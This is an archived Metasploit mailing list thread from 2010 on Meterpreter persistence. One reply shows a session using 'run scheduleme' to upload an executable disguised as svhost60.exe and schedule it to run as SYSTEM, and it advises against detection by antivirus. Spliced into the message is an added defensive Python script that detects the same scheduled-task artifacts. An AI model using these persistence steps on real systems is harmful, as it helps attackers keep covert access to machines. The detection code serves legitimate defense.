Metasploit mailing list archives

Re: A little more about the metsvc service .


From: "Sherif Eldeeb" <archeldeeb () gmail com>
Date: Wed, 7 Jul 2010 16:19:25 +0300

"run persistence" is a nice way to make sure your meterpreter will survive a
reboot, but I use it mostly when I have no admin rights. I'm usually using
"run scheduleme" as a backup plan: you have to be admin or SYSTEM, UAC must
be disabled "if Vista", and you have to have a meterpreter.exe file ready to
be uploaded, since it won't create one for you on the fly like "run
persistence" does (VBS). I really wish there were an option inside "run
scheduleme" to create meterpreter payloads on the fly to save one step, but
no complaints. Anyway, the good thing is that using this method your
meterpreter session will always be started as "SYSTEM". It will copy the
executable to a temp folder and rename it to something like "svhostXX.exe",
so you have to beware of AVs to make sure that it won't be caught; then
it'll schedule its execution based on the given options in a task named
"syscheckXX", and tell you how to undo the whole thing ("thanks HD!"). If the
prerequisites of run scheduleme bother you, just stick to run
persistence, since it works sometimes with normal users ("when choosing the
option to run at user login, not system startup"):

meterpreter > run scheduleme -h
Scheduleme -- provides most common scheduling types used during a pentest
This script can upload a given executable or script and schedule it to be
executed. All scheduled task are run as System so the Meterpreter process
must be System or local admin for local schedules and Administrator for
remote schedules

OPTIONS:

    -c <opt>  Command to execute at the given time. If options for execution needed use double quotes
    -d        Daily.
    -e <opt>  Executable or script to upload to target host, will not work with remote schedule
    -h        Help menu.
    -hr <opt>  Every specified hours 1-23.
    -i        Run command imediatly and only once.
    -l        When a user logs on.
    -m <opt>  Every specified amount of minutes 1-1439
    -o <opt>  Options for executable when upload method used
    -p        Password for account provided.
    -r        Remote Schedule. Executable has to be already on remote target
    -s        At system startup.
    -t <opt>  Remote system to schedule job.
    -u        Username of account with administrative privelages.

meterpreter > run scheduleme -e /root/IA.exe -m 30
[*] Uploading /root/IA.exe....
[*] /root/IA.exe uploaded!
[*] Scheduling command C:\DOCUME~1\victim\LOCALS~1\Temp\svhost60.exe to run
minute.....
[*] The scheduled task has been successfully created
[*] For cleanup run schtasks /delete /tn syscheck65 /F
meterpreter > 

sherif.
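A defender-side check for the artifacts this post describes (a task named syscheckXX that runs a svhostXX.exe copy out of a Temp folder as SYSTEM), written as an added example for this archive page and not code from the thread or from the Metasploit project. The CSV it parses is a constructed sample; the column names assume the headers that `schtasks /query /fo CSV /v` emits.

```python
import csv
import io
import re

# Constructed sample of `schtasks /query /fo CSV /v` output, reduced to the
# columns this check needs. The syscheck65/svhost60.exe row mirrors what the
# post above describes; the other two rows are benign decoys.
SAMPLE_SCHTASKS_CSV = """\
"TaskName","Task To Run","Run As User","Schedule Type"
"\\syscheck65","C:\\DOCUME~1\\victim\\LOCALS~1\\Temp\\svhost60.exe","SYSTEM","Minute"
"\\Microsoft\\Windows\\Defrag\\ScheduledDefrag","%windir%\\system32\\defrag.exe -c","SYSTEM","Weekly"
"\\VendorUpdater","C:\\Program Files\\Vendor\\updater.exe /quiet","SYSTEM","Hourly"
"""

# Indicators taken from the post: task name syscheck<NN>, binary named
# svhost<NN>.exe (svchost.exe with the 'c' missing), staged in a Temp folder.
SYSCHECK_NAME = re.compile(r"^\\?syscheck\d+$", re.I)
SVHOST_LOOKALIKE = re.compile(r"\bsvhost\d*\.exe\b", re.I)
TEMP_PATH = re.compile(r"\\temp\\", re.I)


def audit_scheduled_tasks(csv_text):
    """Return one finding per task that trips at least one indicator."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        name = row.get("TaskName", "")
        command = row.get("Task To Run", "")
        reasons = []
        if SYSCHECK_NAME.search(name):
            reasons.append("task name matches syscheck<NN> pattern")
        if SVHOST_LOOKALIKE.search(command):
            reasons.append("binary spelled svhost, a svchost.exe look-alike")
        if TEMP_PATH.search(command):
            reasons.append("binary executes from a Temp directory")
        # SYSTEM alone is normal for many tasks; only note it alongside a hit.
        if reasons and row.get("Run As User", "").upper() == "SYSTEM":
            reasons.append("runs as SYSTEM")
        if reasons:
            findings.append({"task": name, "command": command, "reasons": reasons})
    return findings


def cleanup_command(task_name):
    """Build the removal command the script prints, as quoted in the post."""
    return f"schtasks /delete /tn {task_name.lstrip(chr(92))} /F"


if __name__ == "__main__":
    for hit in audit_scheduled_tasks(SAMPLE_SCHTASKS_CSV):
        print(hit["task"], "->", hit["command"])
        for reason in hit["reasons"]:
            print("   ", reason)
        print("    cleanup:", cleanup_command(hit["task"]))
```

On a live host, feed it the real output of `schtasks /query /fo CSV /v` instead of the sample; the two regexes are deliberately narrow to the naming the post describes, so extend them before relying on this as a general scheduled-task audit.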

-----Original Message-----
From: framework-bounces () spool metasploit com
[mailto:framework-bounces () spool metasploit com] On Behalf Of Matt Gardenghi
Sent: Wednesday, July 07, 2010 3:44 PM
To: framework () spool metasploit com
Subject: Re: [framework] A little more about the metsvc service .

My experience with metsvc is that it has a memory leak.... I've had
it tank multiple systems before I figured that out. I haven't played
with it yet, but the supported technique is to use "run persistence."

You might want to look into spending time there instead.

Matt

On 7/7/2010 4:23 AM, ubt wrote:
What if I insert a small code to ask for a password authentication in
the _try do block of the server_setup.c beforehand, and one can't install
the metsvc service again to overwrite an installed metsvc service?

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
